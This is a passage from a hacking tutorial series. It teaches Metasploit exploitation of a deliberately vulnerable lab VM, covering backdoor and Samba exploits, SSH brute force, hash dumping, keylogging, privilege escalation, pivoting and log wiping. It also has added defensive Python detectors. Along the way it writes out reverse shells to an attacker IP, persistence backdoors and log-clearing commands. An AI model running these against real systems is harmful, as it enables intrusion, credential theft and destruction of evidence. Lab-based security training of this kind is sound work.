The Hacker's Path: A 5-Part Series
Part 1: Introduction → Part 2: Flipper Mastery → Part 3: Kali Fundamentals → Part 4: Exploitation → Part 5: The Complete Audit
In Parts 1-3, you built your toolkit. You can clone badges, map networks, capture handshakes, and identify every service running on a target. Now you see weaknesses everywhere. But seeing a vulnerability and exploiting it are entirely different skills.
This is where it gets real. Today you'll learn to use the Metasploit Framework, the same tool penetration testers use worldwide. You'll exploit your first vulnerability, establish persistence, escalate privileges, and learn to pivot through a network.
The Line You Must Not Cross
Everything in this article must be practised on systems you own or have explicit written permission to test. Accessing computer systems without authorization is a federal crime punishable by up to 20 years in prison. "I was just learning" is not a defense. Build a lab, use deliberately vulnerable VMs, and never touch systems that aren't yours.
Part 1: Building Your Attack Lab
Before you exploit anything, you need targets. Real penetration testers use isolated lab environments with deliberately vulnerable machines. You'll do the same.
Essential Lab Setup
What You'll Need
- Kali Linux VM - Your attack machine (from Part 3)
- Metasploitable 2 - A deliberately vulnerable Linux VM (SourceForge)
- Metasploitable 3 - A vulnerable Windows/Linux VM (GitHub)
- DVWA - Damn Vulnerable Web Application (GitHub)
- VulnHub VMs - CTF-style vulnerable machines (vulnhub.com)
Project: Lab Network Setup
Time: 45 minutes
- Download Metasploitable 2 from SourceForge
- Import it into VirtualBox/VMware
- Configure networking: put Kali and Metasploitable on a "Host-Only" or "Internal Network" adapter
- Start Metasploitable (default login: msfadmin/msfadmin)
- Note its IP address: `ifconfig`
- From Kali, confirm connectivity: `ping METASPLOITABLE_IP`
- Run an initial scan: `sudo nmap -sV -sC METASPLOITABLE_IP`
Verification: You should see many open ports. Metasploitable is designed to be broken.
Your nmap scan of Metasploitable should show services such as FTP, SSH, Telnet, SMTP, HTTP, Samba, MySQL, PostgreSQL, and more, many of them running old, vulnerable versions. This is your practice ground.
Part 2: Metasploit Framework Fundamentals
Metasploit is not just a tool. It's an entire ecosystem, with thousands of exploits, payloads, auxiliary modules, and post-exploitation tools. Understanding its structure is essential.
Starting Metasploit
```bash
# Initialize the database (first time only)
sudo msfdb init
# Start Metasploit console
msfconsole
# You'll see the Metasploit banner and prompt:
msf6 >
```
Metasploit's Structure
Metasploit organizes everything into modules:
- Exploits - Code that takes advantage of a vulnerability
- Payloads - Code that runs after exploitation (shells, Meterpreter)
- Auxiliary - Scanners, fuzzers, and other tools
- Post - Post-exploitation modules for persistence, pivoting
- Encoders - Obfuscate payloads to evade detection
```bash
# Search for modules
msf6 > search type:exploit platform:linux smb
# Search by CVE
msf6 > search cve:2017-0144
# Search by name
msf6 > search vsftpd
# Get info about a module
msf6 > info exploit/unix/ftp/vsftpd_234_backdoor
```
Exploitation Workflow
Every exploitation in Metasploit follows the same pattern:
- Choose an exploit: `use exploit/path/to/module`
- Set the options: target IP, port, credentials
- Choose a payload: what runs after exploitation
- Execute: `exploit` or `run`
Part 3: Your First Exploit
Let's use one of the most famous backdoors in history: the vsftpd 2.3.4 backdoor. In 2011, someone slipped a backdoor into the vsftpd source code. If you send a username ending in :), a shell opens on port 6200.
Metasploitable 2 runs exactly this version.
```bash
# Start Metasploit
msfconsole
# Search for the exploit
msf6 > search vsftpd
# Select the exploit
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
# View required options
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options
# Set the target
msf6 exploit(...) > set RHOSTS 192.168.56.101
# Run the exploit
msf6 exploit(...) > exploit
# If successful:
[*] Command shell session 1 opened
[+] Got shell!
# You now have a root shell on the target
whoami
root
id
uid=0(root) gid=0(root)
```
That's it. One vulnerable service, one exploit, root access. This is why keeping software updated matters.
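The backdoor described above has two cheap signals a defender can watch for: the vsftpd 2.3.4 banner, and an FTP USER command ending in ":)" followed by a connection from the same client to port 6200. The Python below is an added example, not code from the original post or from Metasploit; the log lines it parses are constructed samples in an assumed "client server payload" layout.

```python
"""Detection for the vsftpd 2.3.4 backdoor described above (added
example, not code from the post or Metasploit). Signals: the 2.3.4
banner, a USER command ending in ":)", and a follow-up connection to
TCP 6200 from the same client. Log formats and values are constructed.
"""
import re
from typing import Dict, List

BACKDOOR_PORT = 6200
BANNER_RE = re.compile(r"\(vsFTPd 2\.3\.4\)")

# Constructed FTP command log, one "<client> <server> <FTP line>" per row.
SAMPLE_FTP_LOG = """\
10.0.0.5 192.168.56.101 USER msfadmin
10.0.0.5 192.168.56.101 PASS msfadmin
10.0.0.9 192.168.56.101 USER anonymous:)
10.0.0.9 192.168.56.101 PASS x
"""
# Constructed connection log, one "<client> <server> <dst_port>" per row.
SAMPLE_CONN_LOG = """\
10.0.0.5 192.168.56.101 21
10.0.0.9 192.168.56.101 21
10.0.0.9 192.168.56.101 6200
"""

def backdoored_banner(greeting: str) -> bool:
    """True if the FTP greeting advertises the known-backdoored release."""
    return BANNER_RE.search(greeting) is not None

def find_trigger_attempts(ftp_log: str) -> List[Dict[str, str]]:
    """USER commands carrying the ':)' trigger, with client and server."""
    hits = []
    for line in ftp_log.splitlines():
        client, server, cmd = line.split(" ", 2)
        verb, _, arg = cmd.partition(" ")
        if verb.upper() == "USER" and arg.rstrip().endswith(":)"):
            hits.append({"client": client, "server": server, "user": arg})
    return hits

def confirmed_backdoor_use(ftp_log: str, conn_log: str) -> List[str]:
    """Clients that sent the trigger AND then connected to port 6200."""
    triggered = {(h["client"], h["server"]) for h in find_trigger_attempts(ftp_log)}
    confirmed = []
    for line in conn_log.splitlines():
        client, server, port = line.split()
        if int(port) == BACKDOOR_PORT and (client, server) in triggered:
            confirmed.append(client)
    return confirmed

if __name__ == "__main__":
    print(backdoored_banner("220 (vsFTPd 2.3.4)"))
    print(find_trigger_attempts(SAMPLE_FTP_LOG))
    print(confirmed_backdoor_use(SAMPLE_FTP_LOG, SAMPLE_CONN_LOG))
```

The banner check alone only tells you the vulnerable release is present; the trigger-plus-6200 correlation is what tells you someone actually used it.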
Project: Exploiting the vsftpd Backdoor
Time: 15 minutes
Prerequisites: Metasploitable 2 running, Kali on the same network
- Confirm FTP is running: `nmap -sV -p 21 TARGET_IP`
- Start msfconsole
- Search for, select, and configure the vsftpd exploit
- Run the exploit
- Once you have a shell, explore: `cat /etc/shadow`
Success criteria: You can read /etc/shadow, which only root can access.
Part 4: Understanding Payloads
A payload is what runs after an exploit succeeds. The basic shell we got above is simple, but Metasploit offers far more powerful options.
Payload Types
- Singles - Self-contained, single-purpose payloads (add a user, run a command)
- Stagers - Small payloads that set up a connection, then fetch the main payload
- Stages - The main payload downloaded by the stager (Meterpreter)
```bash
# List compatible payloads for current exploit
msf6 exploit(...) > show payloads
# Set a specific payload
msf6 exploit(...) > set PAYLOAD linux/x86/meterpreter/reverse_tcp
# Payload naming convention:
# platform/arch/payload_type/connection_type
# linux/x86/meterpreter/reverse_tcp
# windows/x64/shell/bind_tcp
```
Reverse vs. Bind Shells
- Reverse shell - The target connects back to you. Better for getting past firewalls (outbound traffic is usually allowed).
- Bind shell - The target opens a port for you to connect to. Easier to detect, and often blocked by firewalls.
```bash
# For reverse shells, you must set your IP
msf6 exploit(...) > set LHOST YOUR_KALI_IP
msf6 exploit(...) > set LPORT 4444
# Metasploit starts a listener automatically when you exploit
```
Meterpreter: The Best Payload
Meterpreter is Metasploit's most powerful payload. It runs entirely in memory (no files on disk), provides encrypted communication, and includes dozens of built-in post-exploitation commands.
```bash
# Meterpreter commands (once you have a session)
meterpreter > sysinfo        # System information
meterpreter > getuid         # Current user
meterpreter > pwd            # Current directory
meterpreter > ls             # List files
meterpreter > download file  # Download file to Kali
meterpreter > upload file    # Upload file to target
meterpreter > shell          # Drop to system shell
meterpreter > hashdump       # Dump password hashes
meterpreter > screenshot     # Take screenshot
meterpreter > keyscan_start  # Start keylogger
meterpreter > keyscan_dump   # Dump keystrokes
meterpreter > background     # Background this session
```
Part 5: More Exploitation Techniques
Exploiting Samba (SMB)
Metasploitable 2 runs a vulnerable version of Samba. This is similar to the famous EternalBlue exploit used in WannaCry.
```bash
# Search for Samba exploits
msf6 > search type:exploit samba
# The "username map script" vulnerability
msf6 > use exploit/multi/samba/usermap_script
msf6 exploit(...) > set RHOSTS TARGET_IP
msf6 exploit(...) > set PAYLOAD cmd/unix/reverse
msf6 exploit(...) > set LHOST YOUR_IP
msf6 exploit(...) > exploit
[*] Command shell session 2 opened
```
Exploiting Weak Credentials
Not every breach requires a software vulnerability. Weak passwords are everywhere.
```bash
# SSH brute-force auxiliary module
msf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(...) > set RHOSTS TARGET_IP
msf6 auxiliary(...) > set USERNAME root
msf6 auxiliary(...) > set PASS_FILE /usr/share/wordlists/rockyou.txt
msf6 auxiliary(...) > set STOP_ON_SUCCESS true
msf6 auxiliary(...) > run
# For known credentials
msf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(...) > set USERNAME msfadmin
msf6 auxiliary(...) > set PASSWORD msfadmin
msf6 auxiliary(...) > run
[+] 192.168.56.101:22 - Success: 'msfadmin:msfadmin'
```
Web Application Exploitation
Metasploitable includes several vulnerable web applications. Let's exploit PHP code injection.
```bash
# First, browse to http://TARGET/mutillidae/
# Find the "User Lookup" page (vulnerable to SQLi and code injection)
# Use Metasploit's web exploits
msf6 > search type:exploit php
# Or exploit manually with command injection:
# In vulnerable input field:
; cat /etc/passwd
; nc -e /bin/bash YOUR_IP 4444
```
Project: Exploiting Three Different Services
Time: 60 minutes
Target: Metasploitable 2
- Exploit the vsftpd backdoor (FTP - port 21) and get a root shell
- Exploit Samba usermap_script (SMB - ports 139/445) and get a root shell
- Crack SSH credentials (port 22) using auxiliary/scanner/ssh/ssh_login
- Document each exploitation: module used, options set, result
Bonus: Explore the web applications on port 80 and find manual exploitation paths.
Part 6: Post-Exploitation
Getting a shell is just the beginning. A real penetration test requires showing what an attacker could do with that access. This is post-exploitation.
Information Gathering
```text
# From a Meterpreter session
meterpreter > sysinfo
Computer    : metasploitable
OS          : Linux 2.6.24
Architecture: i686
Meterpreter : x86/linux
# Network information
meterpreter > ipconfig
meterpreter > route
meterpreter > arp
```
```bash
# From a regular shell
cat /etc/passwd   # All users
cat /etc/shadow   # Password hashes (requires root)
cat /etc/hosts    # Network mappings
netstat -tulpn    # Open ports
ps aux            # Running processes
crontab -l        # Scheduled tasks
```
Credential Harvesting
```text
# Dump password hashes
meterpreter > hashdump
root:$1$XtqVHIvN$0MnR7..........:0:0:root:/root:/bin/bash
msfadmin:$1$XN10Zj2c$Rt/zzC........:1000:1000::/home/msfadmin:/bin/bash
```
```bash
# Or from shell
cat /etc/shadow
# Crack hashes offline with John the Ripper
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
# Or hashcat (faster with GPU)
hashcat -m 500 hashes.txt /usr/share/wordlists/rockyou.txt
```
Establishing Persistence
Persistence means keeping access even after a reboot, or after the exploit path you originally used has been patched.
```bash
# Add a new user with sudo access
useradd -m -s /bin/bash hacker
echo "hacker:password123" | chpasswd
usermod -aG sudo hacker
# Add SSH key for passwordless access
mkdir /home/hacker/.ssh
echo "YOUR_PUBLIC_KEY" >> /home/hacker/.ssh/authorized_keys
# Cron-based reverse shell (reconnects every minute)
echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'" >> /var/spool/cron/crontabs/root
# Metasploit persistence module
meterpreter > run persistence -h
meterpreter > run persistence -X -i 60 -p 4444 -r YOUR_IP
```
Persistence = Evidence
Every persistence method leaves traces. In a real penetration test, you document what you could do, then you clean up. Leaving backdoors on client systems is unprofessional and may be illegal. In your lab, try everything, but understand the consequences.
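Because each of the persistence steps above leaves an artifact, a host audit can look for exactly those artifacts. The Python below is an added example (not code from the original post) that checks constructed stand-ins for /etc/passwd, /etc/group, a user's authorized_keys and a root crontab; the file contents, the allow-lists and the callback address 192.0.2.10 are all assumed sample data.

```python
"""Audit for the persistence artifacts described above: an extra UID-0
or sudo-capable account, an unapproved SSH key, and a cron entry that
calls back out. Added example, not code from the original post. Inputs
are constructed stand-ins for /etc/passwd, /etc/group, authorized_keys
and a root crontab; on a real host read those files instead.
"""
import re
from typing import List, Set

SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
msfadmin:x:1000:1000::/home/msfadmin:/bin/bash
hacker:x:1001:1001::/home/hacker:/bin/bash
backup2:x:0:0:root:/root:/bin/bash
"""
SAMPLE_GROUP = "sudo:x:27:msfadmin,hacker\nusers:x:100:\n"
SAMPLE_KEYS = "ssh-ed25519 AAAAC3Nz...constructed... pentest@kali\n"
SAMPLE_CRON = ("0 3 * * * /usr/local/bin/backup.sh\n"
               "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/192.0.2.10/4444 0>&1'\n")
# Fragments typical of cron-based reverse shells, incl. the /dev/tcp form.
CALLBACK_RE = re.compile(r"/dev/tcp/|\bnc\b.*\s-e\s|bash -i|mkfifo")

def extra_uid0_accounts(passwd: str) -> List[str]:
    """Accounts other than root that carry UID 0."""
    found = []
    for line in passwd.splitlines():
        name, _pw, uid, *_rest = line.split(":")
        if uid == "0" and name != "root":
            found.append(name)
    return found

def unexpected_sudoers(group: str, allowed: Set[str]) -> List[str]:
    """sudo-group members missing from the approved allow-list."""
    for line in group.splitlines():
        name, _pw, _gid, members = line.split(":")
        if name == "sudo":
            return [m for m in members.split(",") if m and m not in allowed]
    return []

def unknown_keys(authorized_keys: str, approved_comments: Set[str]) -> List[str]:
    """authorized_keys lines whose comment is not an approved key label."""
    bad = []
    for line in authorized_keys.splitlines():
        parts = line.split()
        if len(parts) >= 2 and (len(parts) < 3 or parts[2] not in approved_comments):
            bad.append(line)
    return bad

def callback_cron_lines(crontab: str) -> List[str]:
    """Crontab lines that look like reverse-shell callbacks."""
    return [l for l in crontab.splitlines() if CALLBACK_RE.search(l)]

if __name__ == "__main__":
    print(extra_uid0_accounts(SAMPLE_PASSWD))
    print(unexpected_sudoers(SAMPLE_GROUP, {"msfadmin"}))
    print(unknown_keys(SAMPLE_KEYS, {"admin@laptop"}))
    print(callback_cron_lines(SAMPLE_CRON))
```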
Part 7: Privilege Escalation
You often get initial access as a low-privilege user. Escalating to root/admin is usually required to reach the test's objectives.
Linux Privilege Escalation
```bash
# Current user context
id
whoami
# SUID binaries (run as owner regardless of who executes)
find / -perm -4000 -type f 2>/dev/null
# World-writable directories
find / -writable -type d 2>/dev/null
# Sudo permissions
sudo -l
# Kernel version (for kernel exploits)
uname -a
# Running processes as root
ps aux | grep root
# Cron jobs
cat /etc/crontab
ls -la /etc/cron.*
```
Automated Enumeration Scripts
- LinPEAS - github.com/carlospolop/PEASS-ng
- LinEnum - github.com/rebootuser/LinEnum
- linux-exploit-suggester - GitHub
```bash
# Upload and run LinPEAS
# From Kali, host the script:
python3 -m http.server 8000
# From target:
wget http://YOUR_IP:8000/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
# LinPEAS highlights potential vectors in colors:
# RED/YELLOW = Critical findings, likely exploitable
```
Common Linux Privesc Paths
```bash
# 1. Sudo misconfiguration
sudo -l
# If you see: (ALL) NOPASSWD: /usr/bin/vim
sudo vim -c '!sh'
# Instant root shell
# 2. SUID binary exploitation
# If /usr/bin/find has SUID bit:
find . -exec /bin/sh -p \;
# 3. Writable /etc/passwd
# Generate password hash:
openssl passwd -1 mypassword
# Add to /etc/passwd:
echo 'hacker:$1$xyz$...:0:0:root:/root:/bin/bash' >> /etc/passwd
# 4. Cron job exploitation
# If a cron runs a writable script as root:
echo 'chmod +s /bin/bash' >> /path/to/cron/script
# Wait for cron, then:
/bin/bash -p
# Root shell
```
Windows Privilege Escalation
If you're testing Windows targets (Metasploitable 3), the techniques differ:
```text
# From Meterpreter on Windows
meterpreter > getuid
Server username: VICTIM\lowpriv_user
meterpreter > getsystem
[+] ...got SYSTEM
# If getsystem fails, try:
meterpreter > run post/multi/recon/local_exploit_suggester
# Or background and use specific exploit:
meterpreter > background
msf6 > use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
msf6 exploit(...) > set SESSION 1
msf6 exploit(...) > exploit
```
Project: Escalating from User to Root
Time: 45 minutes
Scenario: You have SSH access to Metasploitable as msfadmin (not root)
- SSH to Metasploitable: `ssh msfadmin@TARGET`
- Run `id` to confirm you are not root
- Check sudo permissions: `sudo -l`
- Look for SUID binaries: `find / -perm -4000 2>/dev/null`
- Upload and run LinPEAS
- Identify a privesc path and exploit it
Goal: Get a root shell by some means other than exploiting a network service.
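The four privesc paths listed under Common Linux Privesc Paths above double as a hardening checklist. The Python below is an added example (not code from the original post or from LinPEAS) that audits constructed inputs: `sudo -l` output, a path-to-mode table standing in for os.stat results, and a crontab line; the shell-capable binary list is assumed and limited to the binaries the article names plus the shells themselves.

```python
"""Hardening check for the four privesc paths listed above (added example,
not code from the original post or LinPEAS): NOPASSWD sudo rules on
shell-capable binaries, SUID bits on shell-capable binaries, a writable
/etc/passwd, and root cron jobs whose script others can write. Inputs
are constructed: `sudo -l` output, a path->st_mode table, a crontab.
"""
import re
import stat
from typing import Dict, List

# Binaries that hand out a shell when run with privileges: the ones the
# article names (vim, find) plus the shells themselves.
SHELL_CAPABLE = {"vim", "find", "bash", "sh"}

SAMPLE_SUDO_L = """\
User msfadmin may run the following commands on metasploitable:
    (ALL) NOPASSWD: /usr/bin/vim
    (root) /usr/bin/apt
"""
# Constructed path -> mode bits, shaped like os.stat(path).st_mode.
SAMPLE_FILES: Dict[str, int] = {
    "/usr/bin/find": stat.S_IFREG | stat.S_ISUID | 0o755,
    "/usr/bin/passwd": stat.S_IFREG | stat.S_ISUID | 0o755,
    "/etc/passwd": stat.S_IFREG | 0o666,
    "/usr/local/bin/backup.sh": stat.S_IFREG | 0o777,
}
SAMPLE_CRON = "*/5 * * * * root /usr/local/bin/backup.sh\n"   # /etc/crontab style

def risky_sudo_rules(sudo_l: str) -> List[str]:
    """NOPASSWD rules whose target binary can spawn a shell."""
    return [m.group(1) for m in re.finditer(r"NOPASSWD:\s*(\S+)", sudo_l)
            if m.group(1).rsplit("/", 1)[-1] in SHELL_CAPABLE]

def risky_suid(files: Dict[str, int]) -> List[str]:
    """SUID binaries that are shell-capable (passwd is SUID by design)."""
    return [p for p, mode in files.items()
            if mode & stat.S_ISUID and p.rsplit("/", 1)[-1] in SHELL_CAPABLE]

def world_writable(files: Dict[str, int], path: str) -> bool:
    """True when the 'other' write bit is set on path."""
    return path in files and bool(files[path] & stat.S_IWOTH)

def writable_root_cron_scripts(crontab: str, files: Dict[str, int]) -> List[str]:
    """Scripts root runs from /etc/crontab-style lines that anyone can edit."""
    out = []
    for line in crontab.splitlines():
        parts = line.split()
        if len(parts) >= 7 and parts[5] == "root" and world_writable(files, parts[6]):
            out.append(parts[6])
    return out

if __name__ == "__main__":
    print(risky_sudo_rules(SAMPLE_SUDO_L))
    print(risky_suid(SAMPLE_FILES))
    print(world_writable(SAMPLE_FILES, "/etc/passwd"))
    print(writable_root_cron_scripts(SAMPLE_CRON, SAMPLE_FILES))
```

Each non-empty result is a finding to fix (drop the NOPASSWD rule, strip the SUID bit, restore 0644 on /etc/passwd, make the cron script root-owned and non-writable).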
Part 8: Pivoting
Pivoting means using a compromised system to attack other systems that aren't directly reachable from your attack machine. This is how attackers move laterally through networks.
Pivot Scenario
Imagine this network:
- Your Kali: 192.168.1.100
- Compromised host: 192.168.1.50 (also connected to the internal network 10.0.0.0/24)
- Target: 10.0.0.10 (reachable only from 192.168.1.50)
You can't reach 10.0.0.10 directly. But through the compromised host, you can.
Metasploit Routing
```text
# After getting a Meterpreter session on the pivot host
meterpreter > ipconfig
# Shows two interfaces: 192.168.1.50 and 10.0.0.50
meterpreter > run autoroute -s 10.0.0.0/24
[+] Added route to 10.0.0.0/24 via session 1
meterpreter > background
# Now Metasploit routes 10.0.0.0/24 traffic through session 1
msf6 > route print
# Scan the internal network
msf6 > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(...) > set RHOSTS 10.0.0.1-254
msf6 auxiliary(...) > set PORTS 22,80,443,445
msf6 auxiliary(...) > run
# Exploit internal targets through the pivot
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(...) > set RHOSTS 10.0.0.10
msf6 exploit(...) > exploit
```
SOCKS Proxy for Full Access
```bash
# Set up a SOCKS proxy through Meterpreter
msf6 > use auxiliary/server/socks_proxy
msf6 auxiliary(...) > set SRVPORT 1080
msf6 auxiliary(...) > run
# Configure proxychains (/etc/proxychains4.conf)
socks5 127.0.0.1 1080
# Now any tool can access the internal network
proxychains nmap -sT -Pn 10.0.0.10
proxychains curl http://10.0.0.10
proxychains ssh [email protected]
```
SSH Tunneling (Without Metasploit)
```bash
# Dynamic port forwarding (SOCKS proxy)
ssh -D 1080 user@pivot_host
# Local port forwarding (specific port)
ssh -L 8080:10.0.0.10:80 user@pivot_host
# Now localhost:8080 reaches 10.0.0.10:80
# Remote port forwarding (expose your service to internal network)
ssh -R 4444:localhost:4444 user@pivot_host
# Internal hosts can reach your port 4444 via pivot_host:4444
```
Part 9: Covering Tracks
Penetration testers document their access but clean up afterwards. Understanding how attackers hide their tracks also helps you detect intrusions.
```bash
# Clear bash history
history -c
cat /dev/null > ~/.bash_history
# Clear auth logs (requires root)
echo "" > /var/log/auth.log
echo "" > /var/log/wtmp
echo "" > /var/log/btmp
# Remove specific log entries
sed -i '/YOUR_IP/d' /var/log/auth.log
# Timestomp (change file timestamps)
touch -r /etc/passwd /path/to/your/file
# Meterpreter
meterpreter > clearev      # Clear Windows event logs
meterpreter > timestomp file -m "01/01/2020 12:00:00"
```
In Real Work: Don't Do This
Penetration testers document their access and report their findings. They don't hide them. Wiping logs destroys the evidence defenders need to understand the attack path. Practise these techniques only in your isolated lab environment.
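The track-covering commands above each leave a residue of their own, which is what the Python below looks for: `touch -r` rewrites atime and mtime but cannot set an inode's ctime, and `echo "" >` leaves a one-byte log file. It is an added example, not code from the original post; it builds its own throwaway files in a temporary directory rather than reading the real log paths.

```python
"""Detection counterparts to the track-covering commands above (added
example, not code from the original post). Two heuristics:
 1. timestomping: `touch -r` rewrites atime/mtime, but the kernel always
    sets ctime to the current time, so ctime far newer than mtime is a
    lead (chmod/chown also bump ctime, so it is a lead, not proof);
 2. log wiping: `echo "" > /var/log/auth.log` leaves a 1-byte file.
The demo builds its own files in a temp dir instead of touching LOG_PATHS.
"""
import os, shutil, tempfile, time
from typing import List, Tuple

LOG_PATHS = ["/var/log/auth.log", "/var/log/wtmp", "/var/log/btmp"]

def looks_timestomped(path: str, min_gap_days: float = 30) -> bool:
    """True when ctime is newer than mtime by more than min_gap_days."""
    st = os.stat(path)
    return (st.st_ctime - st.st_mtime) > min_gap_days * 86400

def wiped_logs(paths: List[str], max_bytes: int = 1) -> List[str]:
    """Existing log files that are (near-)empty, as after `echo "" > log`."""
    return [p for p in paths if os.path.exists(p) and os.path.getsize(p) <= max_bytes]

def demo() -> Tuple[bool, bool, List[str]]:
    """Build a stomped file, an untouched file and a wiped log; return
    (stomped flagged?, untouched flagged?, basenames of wiped logs)."""
    d = tempfile.mkdtemp()
    try:
        stomped = os.path.join(d, "dropper")
        honest = os.path.join(d, "notes.txt")
        wiped = os.path.join(d, "auth.log")
        with open(stomped, "w") as f:
            f.write("dropped file contents\n")
        with open(honest, "w") as f:
            f.write("ordinary file, nothing changed\n")
        # Emulate `touch -r <old reference> dropper`: mtime goes back to
        # 2020 while ctime (not settable from userland) stays "now".
        old = time.mktime((2020, 1, 1, 12, 0, 0, 0, 0, -1))
        os.utime(stomped, (old, old))
        with open(wiped, "w") as f:
            f.write("\n")                 # what `echo "" > auth.log` leaves
        names = [os.path.basename(p) for p in wiped_logs([wiped, honest])]
        return looks_timestomped(stomped), looks_timestomped(honest), names
    finally:
        shutil.rmtree(d)

if __name__ == "__main__":
    print(demo())
```

On a real host, run `wiped_logs(LOG_PATHS)` and `looks_timestomped` over recently created executables; `sed -i` rewrites the whole file, so a freshly modified auth.log with a suspicious gap is the analogous lead for line deletion.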
Part 4 Checklist
☐ Lab Setup: Metasploitable 2 running, isolated network configured
☐ Metasploit: Database initialized, basic navigation learned
☐ First Exploit: vsftpd backdoor exploited, root shell obtained
☐ Multiple Paths: FTP and SMB exploited, SSH credentials cracked
☐ Post-Exploitation: Password hashes dumped, system enumerated
☐ Privilege Escalation: Escalated from user to root without a network exploit
☐ Pivoting: autoroute and SOCKS proxy concepts understood
☐ Documentation: All exploits documented with steps and evidence
What's Next
You've learned to exploit vulnerabilities, escalate privileges, and pivot through networks. You've seen how quickly a single vulnerability becomes a full compromise. You understand what penetration testers actually do.
In Part 5, we bring it all together. You'll conduct a complete security audit from start to finish:
- Scope and rules of engagement
- A complete reconnaissance methodology
- Systematic exploitation
- Thorough post-exploitation
- Professional reporting
- Remediation recommendations
Part 5 is the culmination. Everything you've learned in this series comes together into a real-world methodology you can use to assess the security of any network you're authorized to test.
You've learned the techniques. Now you'll learn the systematic method. Part 5 turns skills into a complete penetration testing workflow.
See you in Part 5.